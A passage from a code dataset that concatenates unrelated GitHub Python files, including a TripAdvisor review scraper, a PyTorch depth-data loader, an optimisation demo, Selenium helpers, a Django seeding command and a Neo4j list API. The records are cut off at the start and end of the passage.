+ URL)\n # get the name of place for csv file name\n global filename\n\n driver.get(URL)\n driver.maximize_window()\n\n # get review count from the contributions pop-up element\n element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.CLASS_NAME, \"_1q4H5LOk\")))\n ActionChains(driver).move_to_element(element).click().perform()\n time.sleep(1)\n # The text \"x reviews\" where x is the number of user's reviews\n count_text_elements = driver.find_elements_by_class_name(\"_3wryStHh\")\n # Flag to check if the user has any reviews\n reviews_available = False\n for element in count_text_elements:\n if 'reviews' in element.text or 'review' in element.text:\n count_text = element.text\n reviews_available = True\n if not reviews_available:\n print(\"\\nThe user does not have any reviews.\")\n return\n\n # The above string stripped of non-numeric characters and adjusted for thousands\n count = int(re.sub(\"[^0-9]\", \"\", count_text).replace(\",\", \"\"))\n # Click X for the contributions pop-up\n driver.find_element_by_class_name(\"_2EFRp_bb._9Wi4Mpeb\").click()\n time.sleep(1)\n\n # username as the filename\n username = driver.find_element_by_class_name(\"gf69u3Nd\").text\n\n filename = 
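In the review-count parsing below, the .replace(",", "") is redundant: re.sub("[^0-9]", ...) has already stripped the commas along with every other non-digit. A standalone check:

import re

count_text = "1,234 reviews"
assert int(re.sub(r"[^0-9]", "", count_text)) == 1234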
os.path.join('output_profiles', username + \".csv\")\n print('\\nReady to scrape ' + username + \"'s profile with \" + str(count) + \" reviews.\")\n\n # open csv file and add titles only if they do not already exist\n if os.path.isfile(filename):\n print(\"\\nUser profile is already parsed. Continuing!\")\n return\n with open(filename, mode='w', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerow(\n [str('reviewTitle'), str('review_details'), str('reviewDate'), str('reviewFor'), str(\"reviewRating\"),\n str('reviewLocation')])\n\n end_count = count\n\n get_user_reviews(URL, end_count)\n print('\\nSaved reviews in page = ', str(end_count), ' user = ', filename)\n print()\n\n\n# Reads all user profiles' URLs from the users who have reviewed fishing tourism businesses\nURLs = read_comments_from_files()['reviewer_profile']\n\n# Reads a URL at a time and calls the scraping function\n# for url in tqdm(reversed(URLs)): # inverse order\nfor url in tqdm(URLs): # correct order\n try:\n driver.set_page_load_timeout(10)\n get_user_profile_by_url(url)\n except TimeoutException as e:\n isrunning = 0\n print('\\nThere is an issue, check again ' + url + \" & Exception: \" + str(e))\n driver.close()\n\n print()\n\nprint('\\nProgram is complete.')\ndriver.close()\n","repo_name":"syfantid/FishingTourismNLP","sub_path":"data_collection/scraper_user_profiles.py","file_name":"scraper_user_profiles.py","file_ext":"py","file_size_in_byte":12605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6349196044","text":"import math\n\n\nclass TriangleCalculator:\n \"\"\" Класс-калькулятор площадей треугольников. \"\"\"\n\n @classmethod\n def area(cls, *args):\n \"\"\"\n Метод, который считает площадь по разным формулам,\n в зависимости от количества переданных аргументов.\n \"\"\"\n if len(args) == 2:\n cls.area_by_height(*args)\n if len(args) == 3:\n cls.area_by_angle(*args)\n\n @staticmethod\n def area_by_angle(a, b, angle):\n \"\"\" Формула площади по двум сторонам и углу между ними. \"\"\"\n return 0.5 * a * b * math.sin(angle)\n\n @staticmethod\n def area_by_height(a, h):\n \"\"\" Формула площади по основанию и высоте. \"\"\"\n return 0.5 * a * h\n\n\nif __name__ == '__main__':\n TriangleCalculator().area() # Работаем через экземпляр\n TriangleCalculator().area_by_height(5, 10) # Работаем через экземпляр\n\n TriangleCalculator.area() # Работаем через класс\n TriangleCalculator.area_by_height(5, 10) # Работаем через класс\n","repo_name":"ValeryKharkov/PythonPY200","sub_path":"Атрибуты и методы/Практические задания/task10_Figure_classmethod_staticmethod/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18312715497","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom torchvision.transforms import functional as TF\nfrom PIL import Image\nfrom io import BytesIO\nimport random\n\ndef _is_pil_image(img):\n return isinstance(img, Image.Image)\n\ndef _is_numpy_image(img):\n return isinstance(img, np.ndarray) and (img.ndim in {2, 3})\n\nclass RandomHorizontalFlip(object):\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n\n if not _is_pil_image(image):\n raise TypeError(\n 'img should be PIL Image. 
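The TriangleCalculator record above (its Russian docstrings describe a triangle-area calculator that picks a formula by argument count) has one real bug: area() calls the formula methods but never returns their results, so it always yields None. A fixed sketch of the dispatcher:

import math

class TriangleCalculator:
    @classmethod
    def area(cls, *args):
        # Dispatch on argument count and actually return the result.
        if len(args) == 2:
            return cls.area_by_height(*args)
        if len(args) == 3:
            return cls.area_by_angle(*args)
        raise TypeError("expected 2 or 3 arguments")

    @staticmethod
    def area_by_angle(a, b, angle):
        return 0.5 * a * b * math.sin(angle)

    @staticmethod
    def area_by_height(a, h):
        return 0.5 * a * h

assert TriangleCalculator.area(5, 10) == 25.0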
Got {}'.format(type(image)))\n if not _is_pil_image(depth):\n raise TypeError(\n 'img should be PIL Image. Got {}'.format(type(depth)))\n\n if random.random() < 0.5:\n image = image.transpose(Image.FLIP_LEFT_RIGHT)\n depth = depth.transpose(Image.FLIP_LEFT_RIGHT)\n\n return {'image': image, 'depth': depth}\n\nclass RandomChannelSwap(object):\n def __init__(self, probability):\n from itertools import permutations\n self.probability = probability\n self.indices = list(permutations(range(3), 3))\n\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n if not _is_pil_image(image): raise TypeError('img should be PIL Image. Got {}'.format(type(image)))\n if not _is_pil_image(depth): raise TypeError('img should be PIL Image. Got {}'.format(type(depth)))\n if random.random() < self.probability:\n image = np.asarray(image)\n image = Image.fromarray(image[...,list(self.indices[random.randint(0, len(self.indices) - 1)])])\n return {'image': image, 'depth': depth}\n\nclass RandomGamma(object):\n \"\"\"\n Apply Random Gamma Correction to the images\n \"\"\"\n def __init__(self, gamma=0):\n self.gamma = gamma\n\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n if self.gamma == 0:\n return {'image': image, 'depth': depth}\n else:\n gamma_ratio = random.uniform(1 / self.gamma, self.gamma)\n return {'image': TF.adjust_gamma(image, gamma_ratio, gain=1),\n 'depth': depth}\n\nfrom zipfile import ZipFile\ndef loadZipToMem(zip_file):\n # Load zip file into memory\n print('Loading dataset zip file...', end='')\n from zipfile import ZipFile\n input_zip = ZipFile(zip_file)\n data = {name: input_zip.read(name) for name in input_zip.namelist()}\n nyu2_train = list((row.split(',') for row in (data['data/nyu2_train.csv']).decode(\"utf-8\").split('\\n') if len(row) > 0))\n\n from sklearn.utils import shuffle\n nyu2_train = shuffle(nyu2_train, random_state=0)\n\n #if True: nyu2_train = nyu2_train[:40]\n\n print('Loaded ({0}).'.format(len(nyu2_train)))\n return data, nyu2_train\n\ndef extract_zip(input_zip):\n input_zip=ZipFile(input_zip)\n return {name: input_zip.read(name) for name in input_zip.namelist()}\n\nclass depthDatasetMemory(Dataset):\n def __init__(self, data, nyu2_train, transform=None):\n self.data, self.nyu_dataset = data, nyu2_train\n self.transform = transform\n\n def __getitem__(self, idx):\n sample = self.nyu_dataset[idx]\n image = Image.open( BytesIO(self.data[sample[0]]) )\n depth = Image.open( BytesIO(self.data[sample[1]]) )\n sample = {'image': image, 'depth': depth}\n if self.transform: sample = self.transform(sample)\n return sample\n\n def __len__(self):\n return len(self.nyu_dataset)\n\nclass ToTensor(object):\n def __init__(self,is_test=False, is_224=False):\n self.is_test = is_test\n self.is_224 = is_224\n\n def __call__(self, sample):\n crop_size = 16\n image, depth = sample['image'], sample['depth']\n image = image.crop((crop_size, crop_size, 640-crop_size, 480-crop_size))\n\n if self.is_224:\n image = image.resize((224, 224))\n else:\n image = image.resize((640, 480))\n\n image = self.to_tensor(image)\n\n depth = depth.crop((crop_size, crop_size, 640-crop_size, 480-crop_size))\n # depth = depth.resize((512, 384))\n # image = image.resize((304, 224))\n if self.is_224:\n depth = depth.resize((224, 224))\n else:\n depth = depth.resize((320, 240))\n\n if self.is_test:\n depth = self.to_tensor(depth).float() / 1000\n else: \n depth = self.to_tensor(depth).float() * 1000\n \n # put in expected range [0.1m, 10m]\n depth = 
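The ToTensor transform below trims a 16-pixel border from each 640×480 frame before resizing, leaving 608×448. A standalone PIL check of that geometry:

from PIL import Image

img = Image.new("RGB", (640, 480))
crop = 16
img = img.crop((crop, crop, 640 - crop, 480 - crop))
assert img.size == (608, 448)
img = img.resize((320, 240))  # depth-map resolution used at train time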
torch.clamp(depth, 10, 1000) # sets depth between 0.1m and 10m. [0, 1] -> [0, 1000] = [0m, 10m]\n\n return {'image': image, 'depth': depth}\n\n def to_tensor(self, pic):\n if not(_is_pil_image(pic) or _is_numpy_image(pic)):\n raise TypeError(\n 'pic should be PIL Image or ndarray. Got {}'.format(type(pic)))\n\n if isinstance(pic, np.ndarray):\n img = torch.from_numpy(pic.transpose((2, 0, 1)))\n\n return img.float().div(255)\n\n # handle PIL Image\n if pic.mode == 'I':\n img = torch.from_numpy(np.array(pic, np.int32, copy=False))\n elif pic.mode == 'I;16':\n img = torch.from_numpy(np.array(pic, np.int16, copy=False))\n else:\n img = torch.ByteTensor(\n torch.ByteStorage.from_buffer(pic.tobytes()))\n # PIL image mode: 1, L, P, I, F, RGB, YCbCr, RGBA, CMYK\n if pic.mode == 'YCbCr':\n nchannel = 3\n elif pic.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n if isinstance(img, torch.ByteTensor):\n return img.float().div(255)\n else:\n return img\n\nclass NormalizeImage(object):\n \"\"\"\n Apply Random Gamma Correction to the images\n \"\"\"\n def __init__(self, mean, std, inplace=False):\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def __call__(self, sample_tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n image_tensor, depth_tensor = sample_tensors['image'], sample_tensors['depth']\n return {'image': TF.normalize(image_tensor, self.mean, self.std, self.inplace),\n 'depth': depth_tensor}\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\ndef getNoTransform(is_test=False, is_224=False):\n transforms_list = [ToTensor(is_test=is_test, is_224=is_224)]\n # if normalize_input:\n # transforms_list.append(NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]))\n return transforms.Compose(transforms_list)\n\ndef getDefaultTrainTransform(is_224=False):\n transforms_list = [\n RandomHorizontalFlip(),\n RandomChannelSwap(0.1),\n RandomGamma(0.8),\n ToTensor(is_224=is_224)\n ]\n # if normalize_input:\n # transforms_list.append(NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]))\n return transforms.Compose(transforms_list)\n\ndef getTrainingTestingData(batch_size, num_workers=8, is_224=False):\n data, nyu2_train = loadZipToMem('nyu_data.zip')\n\n transformed_training = depthDatasetMemory(data, nyu2_train, transform=getDefaultTrainTransform(is_224=is_224))\n transformed_testing = depthDatasetMemory(data, nyu2_train, transform=getNoTransform(is_224=is_224))\n\n return DataLoader(transformed_training, batch_size, shuffle=True, num_workers=num_workers), \\\n DataLoader(transformed_testing, batch_size, shuffle=False, num_workers=num_workers)\n","repo_name":"nianticlabs/wavelet-monodepth","sub_path":"NYUv2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"95"} +{"seq_id":"32711543056","text":"# coding=utf-8\nfrom urllib.parse import urlparse\n\n\nclass ParsedURL(object):\n \"\"\"\n Wrapper for urlparse that removes the copy/paste work of hostname, port, ssl, and path.\n \"\"\"\n\n __slots__ = [\"url\", \"host\", \"port\", \"path\", \"secure\", \"path\", \"urlparse\"]\n\n def __init__(self, url: str):\n self.url = url\n self.urlparse = urlparse(url)\n\n 
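Per the inline comment, depth targets live in [10, 1000] at 100 units per metre, i.e. 0.1 m to 10 m. A small sketch of the clamp and the inverse mapping back to metres (not from the original file):

import torch

depth = torch.clamp(torch.tensor([5.0, 500.0, 2000.0]), 10, 1000)
print(depth / 100.0)  # tensor([ 0.1000,  5.0000, 10.0000]) -- metres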
self.host = str(self.urlparse.hostname)\n self.secure = self.urlparse.scheme == \"https://\"\n\n # try/except because of URLs like http://127.0.0.1:4986″\n try:\n self.port = int(self.urlparse.port)\n except (ValueError, TypeError):\n self.port = None\n\n # Fill in the port if no ports are given.\n if not self.port:\n if self.secure:\n self.port = 443\n else:\n self.port = 80\n\n self.path = '/' if self.urlparse.path == '' else self.urlparse.path\n","repo_name":"general-programming/torspider","sub_path":"spidercommon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"73172860471","text":"# Optimization of the 2d Rosen function\nimport autograd\nimport autograd.numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import util\nfrom utils import optim\nfrom scipy.optimize import rosen, rosen_der, rosen_hess\nfrom scipy import optimize as opt\nimport scipy.linalg as la\n\n#http://people.duke.edu/~ccc14/sta-663/BlackBoxOptimization.html\n\ndef reporter(p):\n \"\"\"Reporter function to capture intermediate states of optimization.\"\"\"\n global ps\n #ps.append(p)\n ps.append(np.copy(p))\n\ndef plot_trace(ps, ttl):\n x = np.linspace(-5, 5, 100)\n y = np.linspace(-5, 5, 100)\n X, Y = np.meshgrid(x, y)\n Z = rosen(np.vstack([X.ravel(), Y.ravel()])).reshape((100,100))\n ps = np.array(ps)\n plt.figure(figsize=(12,4))\n plt.subplot(121)\n plt.contour(X, Y, Z, np.arange(10)**5)\n plt.plot(ps[:, 0], ps[:, 1], '-o')\n plt.plot(1, 1, 'r*', markersize=12) # global minimum\n plt.subplot(122)\n plt.semilogy(list(range(len(ps))), rosen(ps.T))\n plt.title(ttl)\n\n# Initial starting position\nx0 = np.array([4,-4.1])\n\n#logger = optim.OptimLogger(rosen, 1, 1, 1)\n\nps = [x0]\nres = opt.minimize(rosen, x0, method='Newton-CG', jac=rosen_der, hess=rosen_hess, callback=reporter)\nprint('\\nresults of Newton-CG')\nprint(res)\nplot_trace(ps, 'Newton, obj {:0.4f}'.format(res.fun))\n\nps = [x0]\nres = opt.minimize(rosen, x0, method='BFGS', jac=rosen_der, callback=reporter)\nprint('\\nresults of BFGS')\nprint(res)\nplot_trace(ps, 'BFGS, obj {:0.4f}'.format(res.fun))\n\nps = [x0]\nlr = 0.0001\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\nps = [x0]\nlr = 0.0002\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\nps = [x0]\nlr = 0.0004\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\n\nps = [x0]\nparams, obj, lr = optim.autoadam(rosen, 'bisection', rosen, rosen_der, x0, 100, reporter)\nprint('\\nAdam final params {}'.format(params))\nplot_trace(ps, 'Adam(Bisection {:0.4f}), obj {:0.4f}'.format(lr, obj))\n\n\nplt.show()\n","repo_name":"krc3004/murphy_ml_python","sub_path":"examples/rosen_demo.py","file_name":"rosen_demo.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"20540864017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' a test module '\n\n__author__ = 'hualai yu'\n\nfrom selenium import webdriver\nfrom 
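One subtle bug in the ParsedURL snippet above: urlparse returns the scheme without "://", so the comparison against "https://" is always False and the port fallback treats every URL as plain HTTP. A quick demonstration of the intended check:

from urllib.parse import urlparse

u = urlparse("https://example.com/path")
assert u.scheme == "https"      # never "https://"
secure = u.scheme == "https"    # the comparison presumably intended
assert secure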
selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\n\n\ndef browser(browser='firefox'):\n try:\n if browser == 'firefox':\n driver = webdriver.Firefox()\n return driver\n elif browser == \"chrome\":\n driver = webdriver.Chrome()\n return driver\n elif browser == \"ie\":\n driver = webdriver.Ie()\n return driver\n elif browser == \"phantomjs\":\n driver = webdriver.PhantomJS()\n return driver\n else:\n print(\"Not found this browser,You can enter 'firefox', 'chrome', 'ie', or 'phantomjs'\")\n except Exception as msg:\n print(\"%s\" % msg)\n\n\nclass HuaLai:\n def __init__(self, driver):\n self.driver = driver\n\n def open(self, url, t='', timeout=10):\n self.driver.get(url)\n self.driver.maximize_window()\n\n try:\n WebDriverWait(self.driver, timeout, 1).until(EC.title_contains(t))\n except TimeoutException:\n print(\"open %s title error\" % url)\n except Exception as msg:\n print(\"Erroe:%s\" % msg)\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator):\n element = self.find_element(locator)\n element.click()\n\n def send_keys(self, locator, text):\n element = self.find_element(locator)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout, 1).until(EC.text_to_be_present_in_element(locator, text))\n print(result)\n except TimeoutException:\n print(\"元素没定位到:\" + str(locator))\n return False\n else:\n return result\n\n\nif __name__ == '__main__':\n driver = browser()\n driver1 = browser(\"chrome\")","repo_name":"yuhualai/Python_automation","sub_path":"Dome/test_003.py","file_name":"test_003.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"4005060239","text":"# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\n# varFrase = 'VARIABLE WORD theme music SounD ... @ !'\n#\n# #### Test open file on python\nvariablePathFile = '/home/mark/Documents/Datasets/tweets2009Part00'\narrayVariablePathFile = [28]\narrayVariablePathFile[0] = \"/home/mark/Documents/Datasets/tweets2009Part00\"\n\n########## Better to get a quantitie on the directory\nquantitieFiles = 28\n\nfor indice in range(quantitieFiles):\n arrayVariablePathFile.append(\"/home/mark/Documents/Datasets/tweets2009Part0\"+str(indice))\n\nfor j in arrayVariablePathFile:\n print (j)\n######## Contagem de quantas linhas há no arquivo\n# def file_lengthy(fname):\n# with open(fname) as f:\n# for i, l in enumerate(f):\n# pass\n# return i + 1\n#\n###linesFile = file_lengthy(variablePathFile)\n\nsearchBlack = 'black'\nsearchMonkey = 'monkey'\nsearchWord = 'Found !!! 
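The HuaLai wrapper above standardizes explicit waits around a (By, value) locator tuple. The same pattern in isolation, polling once per second up to the timeout:

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def wait_for(driver, locator, timeout=10):
    """Block until the element is present, polling every second."""
    return WebDriverWait(driver, timeout, 1).until(
        EC.presence_of_element_located(locator))

# usage sketch: wait_for(driver, (By.ID, "kw")).send_keys("selenium")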
'\n\nfor indice in range(quantitieFiles):\n with open(arrayVariablePathFile[int(indice)],'r') as f:\n linesFile = f.read().split(\"\\n\")\n\n for i,line in enumerate(linesFile):\n if searchBlack in line and searchMonkey in line.split():\n #if searchMonkey in line:\n print(line)\n print(\"\\nWord \\\"{}\\\" found in line {}\".format(searchWord, i+1))\n#print(\"Number of lines in the file: \",file_lengthy(variablePathFile\n","repo_name":"MarkCarraschi/classification-implementation","sub_path":"SearchOnLoteOfData.py","file_name":"SearchOnLoteOfData.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72609090554","text":"from django.core.management.base import BaseCommand\nfrom stateapi.models import State\n\nclass Command(BaseCommand):\n help = 'Populate database with Nigerian states'\n\n def handle(self, *args, **options):\n states = [\n 'Abia', 'Adamawa', 'Akwa Ibom', 'Anambra', 'Bauchi',\n 'Bayelsa', 'Benue', 'Borno', 'Cross River', 'Delta',\n 'Ebonyi', 'Edo', 'Ekiti', 'Enugu', 'Gombe', 'Imo',\n 'Jigawa', 'Kaduna', 'Kano', 'Katsina', 'Kebbi', 'Kogi',\n 'Kwara', 'Lagos', 'Nasarawa', 'Niger', 'Ogun', 'Ondo',\n 'Osun', 'Oyo', 'Plateau', 'Rivers', 'Sokoto', 'Taraba',\n 'Yobe', 'Zamfara', 'FCT'\n ]\n\n for state_name in states:\n State.objects.create(name=state_name)\n\n self.stdout.write(self.style.SUCCESS('Successfully populated states'))","repo_name":"princewill-dev/NGN-states-api","sub_path":"stateapi/management/commands/populate_states.py","file_name":"populate_states.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31407495616","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
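The populate_states command above inserts a row per state on every run, so running it twice duplicates all 37 entries; Django's get_or_create is the usual guard. A sketch of the loop body under that change:

# Inside handle(), replacing the plain create() call (sketch, not original):
for state_name in states:
    State.objects.get_or_create(name=state_name)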
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n'''DCS Statistics v1 action implementations'''\nimport logging\n\nfrom osc_lib import utils\nfrom osc_lib.command import command\n\nfrom otcextensions.i18n import _\n\nLOG = logging.getLogger(__name__)\n\n\nclass ListStatistic(command.Lister):\n _description = _('List DCS Statistics')\n columns = ('instance_id', 'max_memory', 'used_memory',\n 'cmd_get_count', 'cmd_set_count', 'used_cpu',\n 'input_kbps', 'output_kbps')\n\n def get_parser(self, prog_name):\n parser = super(ListStatistic, self).get_parser(prog_name)\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.dcs\n\n data = client.statistics()\n\n table = (self.columns,\n (utils.get_item_properties(\n s, self.columns,\n ) for s in data))\n return table\n","repo_name":"opentelekomcloud/python-otcextensions","sub_path":"otcextensions/osclient/dcs/v1/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"95"} +{"seq_id":"1526768564","text":"ebrima = [['Gambia', 1992, 'March', 5], ['Oxford', 2010, 'April', 19], ['Lagos', 2015, 'January', 20], ['Stockholm', 2020, 'June', 1]]\n# write a program that going to return the year I traveled to Lagos from the list above\n# print(ebrima[2][1])\n\n# user_input = input('Enter Year of travel: ')\n# if user_input == 2015:\n# print(f'ebrima have travel to {ebrima:2}')\n\n\nalieu = [9, 1, 25, 9, 18, 89, 0, 35]\n# write a program that is going to change the ordering of the above list in decending order\n\n# print(sorted(alieu, reverse=True))\n\n# print(alieu.sort())\n# Given the list, words, of strings below, filter out the palindromes and append to the initial empty list, pal\n\nwords = ['the', 'bib', 'mom', 'table', 'radar']\npal = []\n\ndef isPal(word):\n if word == word[::-1]:\n pal.append(word)\n\n\nfor word in words:\n isPal(word)\n\nprint(pal)\n\n\n\n\n","repo_name":"siseebrima/ebroDev","sub_path":"bini.py","file_name":"bini.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38337452172","text":"\"\"\"\nManage the lists of the researcher\n\"\"\"\nimport re\nfrom typing import Dict, Optional\n\nfrom imc.endpoints import IMCEndpoint\nfrom imc.models import Target\nfrom restapi import decorators\nfrom restapi.config import get_backend_url\nfrom restapi.connectors import neo4j\nfrom restapi.exceptions import BadRequest, Conflict, Forbidden, NotFound\nfrom restapi.models import fields\nfrom restapi.rest.definition import Response\nfrom restapi.services.authentication import User\nfrom restapi.utilities.logs import log\n\nTARGET_PATTERN = re.compile(\"(item|shot):([a-z0-9-])+\")\n\n__author__ = \"Giuseppe Trotta (g.trotta@cineca.it)\"\n\n\nclass List(IMCEndpoint):\n labels = [\"list\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.use_kwargs(\n {\n \"r_uuid\": fields.Str(\n required=False,\n data_key=\"researcher\",\n metadata={\"description\": \"Researcher uuid\"},\n ),\n \"belong_item\": fields.Str(\n required=False,\n data_key=\"item\",\n metadata={\n \"description\": \"Item uuid (used to check whether the item belongs to the list or not)\"\n },\n ),\n \"nb_items\": fields.Bool(\n required=False,\n load_default=False,\n data_key=\"includeNumberOfItems\",\n ),\n },\n location=\"query\",\n )\n @decorators.endpoint(\n 
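The palindrome filter in the bini.py record above (word == word[::-1]) also collapses to a single list comprehension; an equivalent sketch:

words = ['the', 'bib', 'mom', 'table', 'radar']
pal = [w for w in words if w == w[::-1]]
assert pal == ['bib', 'mom', 'radar']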
path=\"/lists/\",\n summary=\"Get a list of the researcher\",\n description=\"Returns all the list of a researcher.\",\n responses={\n 200: \"The list of the researcher.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"The requested list does not exist.\",\n },\n )\n def get(\n self,\n list_id: str,\n user: User,\n r_uuid: Optional[str] = None,\n belong_item: Optional[str] = None,\n nb_items: bool = False,\n ) -> Response:\n \"\"\"Get a certain list for given id.\"\"\"\n graph = neo4j.get_instance()\n i_am_admin = self.auth.is_admin(user)\n researcher = user if not i_am_admin else None\n if i_am_admin and r_uuid is not None:\n researcher = graph.User.nodes.get_or_none(uuid=r_uuid)\n if not researcher:\n log.debug(\"Researcher with uuid {} does not exist\", r_uuid)\n raise NotFound(\"Please specify a valid researcher id\")\n\n res = graph.List.nodes.get_or_none(uuid=list_id)\n if not res:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n creator = res.creator.single()\n if not i_am_admin and researcher.uuid != creator.uuid:\n raise Forbidden(\n \"You are not allowed to get a list that does not belong to you\",\n )\n user_list = self.getJsonResponse(res)\n if i_am_admin and researcher is None:\n user_list[\"creator\"] = {\n \"uuid\": creator.uuid,\n \"name\": creator.name,\n \"surname\": creator.surname,\n }\n\n if belong_item is not None:\n found = False\n for i in res.items.all():\n if i.downcast().uuid == belong_item:\n found = True\n break\n user_list[\"belong\"] = found\n\n if nb_items:\n user_list[\"nb_frames\"] = len(res.items)\n\n return self.response(user_list)\n\n\nclass Lists(IMCEndpoint):\n labels = [\"list\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.use_kwargs(\n {\n \"r_uuid\": fields.Str(\n required=False,\n data_key=\"researcher\",\n metadata={\"description\": \"Researcher uuid\"},\n ),\n \"belong_item\": fields.Str(\n required=False,\n data_key=\"item\",\n metadata={\n \"description\": \"Item uuid (used to check whether the item belongs to the list or not)\"\n },\n ),\n \"nb_items\": fields.Bool(\n required=False,\n load_default=False,\n data_key=\"includeNumberOfItems\",\n ),\n },\n location=\"query\",\n )\n @decorators.endpoint(\n path=\"/lists\",\n summary=\"Get a list of the researcher\",\n description=\"Returns all the list of a researcher.\",\n responses={\n 200: \"The list of the researcher.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"The requested list does not exist.\",\n },\n )\n def get(\n self,\n user: User,\n r_uuid: Optional[str] = None,\n belong_item: Optional[str] = None,\n nb_items: bool = False,\n ) -> Response:\n \"\"\"Get all the list of a user.\"\"\"\n graph = neo4j.get_instance()\n\n i_am_admin = self.auth.is_admin(user)\n researcher = self.get_user() if not i_am_admin else None\n if i_am_admin and r_uuid is not None:\n researcher = graph.User.nodes.get_or_none(uuid=r_uuid)\n if not researcher:\n log.debug(\"Researcher with uuid {} does not exist\", r_uuid)\n raise NotFound(\"Please specify a valid researcher id\")\n\n user_match = \"\"\n optional_match = \"\"\n if researcher:\n user_match = (\n \"MATCH (n)-[:LST_BELONGS_TO]->(:User {{uuid:'{user}'}})\".format(\n user=researcher.uuid\n )\n )\n log.debug(\"researcher: {} {}\", researcher.name, researcher.surname)\n\n if nb_items:\n optional_match = \"OPTIONAL MATCH (n)-[r:LST_ITEM]->(:ListItem)\"\n\n count_items = \", count(r)\" if nb_items else \"\"\n 
